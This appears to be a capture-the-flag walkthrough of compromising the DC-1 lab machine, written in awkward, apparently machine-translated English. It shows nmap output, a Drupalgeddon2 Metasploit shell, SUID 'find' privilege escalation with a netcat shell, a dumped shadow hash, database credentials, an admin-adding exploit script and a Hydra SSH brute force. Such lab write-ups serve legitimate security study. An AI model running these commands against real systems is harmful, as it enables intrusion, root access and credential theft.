**
IP:192.168.110.212
**
A .arp-scan -l to see the same area viable host.
Know the ip and then we visit the home page for the following:
First information collected using nmap port scan port scan revealed the following:
22(ssh) 80(http) . 111(rpcbind)
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35108/tcp6 status
| 100024 1 37240/udp6 status
| 100024 1 37414/udp status
|_ 100024 1 51353/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.83 secondsVersion:
content management system (the CMS) Drupal 7
Web server Apache2.2.22
programming language PHP5.4.45
operating system Debian
JavaScript libraries jQuery1.4.4
II. After completion of the information gathering I first started this to search from https://www.exploit-db.com/?type=webapps according to his version, but in the end no result, and finally from the home page of the hand, from Home to see his cms Drupal is
after check the internet about his vulnerability
III. Msf directly query search drupal, because there are a lot, I will use that time to close the
unix / webapp / drupal_drupalgeddon2 module
Set directly set ip use run -j, then take it directly shell
Entrypython -c 'import pty;pty.spawn("/bin/sh")'
IV. His view is found in the system uname -a linux
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/LinuxAfter mentioning that I was right to find online fashion
now be suid mention the right to find find
find / -user root -perm -4000 -print 2 > / dev / null
found Find command is run in Suid permission to do so, then by find All commands will be executed as the root privileges.
Five first I've created a text file and then enter: find chen -exec whoami \;
find chen -exec netcat -lvp 5555 -e /bin/sh \;VI. On the other side to listen
Seven successful I mention the right to first find in the shadow etc Now there flag4:flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWC
continue to view sensitive files / var / www below 1 found it Tip: Every good CMS requires a configuration file, you too.
VIII. So after I checked on the net drupal configuration file where
/sites/default/settings.php
after the first find query
In this cat /var/www/sites/default/settings.php saw his user name and password
'username' => 'dbuser',
'password' => 'R0ck3t',Now that you know his user and password to connect
IX. Use cat to see his configuration file version information
cat /var/www/includes/bootstrap.inc | grep VERSIONGet VERSION ',' 7.24
just started using searchsploit Drupal are some python script
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.212 -u chen -p chenX. From just using python script to add the user and password to log in
XI. Because the user already knows his name (in the shadow inside to find the user name so it can directly take Hydra blasting)
hydra -l flag4 -P pass.txt ssh://192.168.110.212XII. Now know his password to orange
to connect successfully! ! ! ! !
Username: flag4
Password: orange